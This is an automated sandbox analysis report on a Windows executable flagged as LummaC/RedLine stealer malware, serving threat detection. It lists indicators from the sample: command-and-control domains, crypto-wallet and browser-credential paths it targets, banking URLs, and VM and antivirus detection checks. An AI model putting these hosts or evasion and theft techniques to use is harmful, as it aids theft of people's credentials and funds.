Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00418ED1	0_2_00418ED1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415A62	0_2_00415A62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041EA66	0_2_0041EA66
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00428A18	0_2_00428A18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00422230	0_2_00422230
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042A2C0	0_2_0042A2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C28F	0_2_0043C28F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041FA90	0_2_0041FA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DA91	0_2_0040DA91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041B295	0_2_0041B295
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004092B0	0_2_004092B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043E340	0_2_0043E340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426359	0_2_00426359
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B370	0_2_0043B370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00437300	0_2_00437300
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043F310	0_2_0043F310
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004253C0	0_2_004253C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00432BC0	0_2_00432BC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043BBD0	0_2_0043BBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043E3F0	0_2_0043E3F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402B80	0_2_00402B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F390	0_2_0041F390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426B90	0_2_00426B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004293A4	0_2_004293A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404C40	0_2_00404C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407420	0_2_00407420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00430C20	0_2_00430C20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041248A	0_2_0041248A

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 004156E0 appears 50 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 1856

Source: file.exe, 00000000.00000000.1238180709.0000000000450000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesDefenca2 vs file.exe
Source: file.exe, 00000000.00000003.1245629081.0000000000725000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesDefenca2 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamesDefenca2 vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1608094313.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1608123380.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@12/2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00437DD0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_00437DD0

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4048

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0ecc5d84-3567-499f-812e-0117fa816a25

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.1287586229.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1301434629.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1287255165.0000000002E54000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 1856

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043E0D0 push eax; mov dword ptr [esp], E2E1E0BFh	0_2_0043E0D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004429CA push ebx; ret	0_2_004429CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00421B44 push 00000076h; retf	0_2_00421B46

Source: file.exe

Static PE information: section name: .text entropy: 7.749741592856494

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 2268

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: file.exe, 00000000.00000003.1301078185.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: file.exe, 00000000.00000003.1274773836.000000000072E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274971821.000000000072E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.10.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: file.exe, 00000000.00000003.1300763670.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: file.exe, 00000000.00000003.1300763670.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0043C7A0 LdrInitializeThunk,

0_2_0043C7A0

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe	String found in binary or memory: bashfulacid.lat
Source: file.exe	String found in binary or memory: tentabatte.lat
Source: file.exe	String found in binary or memory: curverpluch.lat
Source: file.exe	String found in binary or memory: talkynicer.lat
Source: file.exe	String found in binary or memory: shapestickyr.lat
Source: file.exe	String found in binary or memory: manyrestro.lat
Source: file.exe	String found in binary or memory: slipperyloo.lat
Source: file.exe	String found in binary or memory: wordyfindy.lat
Source: file.exe	String found in binary or memory: enterwahsh.biz

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 4048, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: ets/Electrum-LTC
Source: file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: file.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.1286771741.0000000000783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
Source: file.exe	String found in binary or memory: Wallets/Exodus
Source: file.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

